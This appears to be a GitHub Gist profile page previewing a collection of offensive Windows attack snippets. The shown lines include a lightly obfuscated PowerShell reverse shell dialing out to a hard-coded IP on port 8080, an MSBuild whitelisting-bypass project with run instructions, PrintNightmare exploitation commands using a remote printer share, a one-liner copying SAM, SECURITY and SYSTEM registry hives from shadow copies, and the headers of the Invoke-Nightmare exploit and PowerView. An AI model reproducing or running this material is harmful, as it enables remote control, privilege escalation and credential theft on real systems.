Skip to content

Instantly share code, notes, and snippets.

Avatar

puniaze

  • CONTOSO
  • Somewhere in forest
View GitHub Profile
View test.ps1
$socket = new-object System.Net.Sockets.TcpClient('147.182.215.228', 8080);
if($socket -eq $null){exit 1}
$stream = $socket.GetStream();
$writer = new-object System.IO.StreamWriter($stream);
$buffer = new-object System.Byte[] 1024;
$DASSAQ = "Ascii"
$DASSAQ +="Encoding"
$dia = "Diagn"
$dia += "ostics"
$pr = "Pr"+"oc"+"ess"
View sicmaq
<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<!-- MSBuildShell, a Powershell Host running within MSBuild.exe -->
<!-- This code let's you Bypass Application Whitelisting and Powershell.exe restrictions. -->
<!-- Save This File And Execute The Following Command: -->
<!-- C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe MSBuildShell.csproj -->
<!-- Author and founder of the MSBuild Application Whitelisting Bypass code: Casey Smith, Twitter: @subTee -->
<!-- Powershell Host Code: Original from Microsoft (MSDN), modified by Cn33liz, Twitter: @Cneelis -->
<!-- License: BSD 3-Clause -->
<Target Name="MSBuildPosh">
<MSBuildShell/>
View gist:ca0f9302e2e4826dc47f9c301617c7d1
net use \\printnightmare.gentilkiwi.com\ipc$ /user:gentilguest password
rundll32 printui.dll,PrintUIEntry /in /n"\\printnightmare.gentilkiwi.com\Kiwi Legit Printer"
View pox.txt
powershell -c "foreach ($i in 1..10){$p='\\.\HarddiskVolumeShadowCopy{0}\windows\system32\config\' -f $i; gi $($p+'SAM'),$($p+'SECURITY'),$($p+'SYSTEM') -ErrorAction SilentlyContinue | % {cp $_.FullName $($_.BaseName+$i)}}"
View gist:e8eaa31a1622d9ee5b1f48148c8fbd73
function Invoke-Nightmare
{
<#
.SYNOPSIS
Exploits CVE-2021-1675 (PrintNightmare)
Authors:
Caleb Stewart - https://github.com/calebstewart
John Hammond - https://github.com/JohnHammond
URL: https://github.com/calebstewart/CVE-2021-1675
View pox.ps1
function AMKBLA
{
param (
[string]$KOKOPOXLU = "Dassaq",
[string]$POXLU = "",
[string]$LOLIPOP = "",
[string]$DLL = ""
)
View test.ps1
#requires -version 2
<#
PowerSploit File: PowerView.ps1
Author: Will Schroeder (@harmj0y)
License: BSD 3-Clause
Required Dependencies: None
#>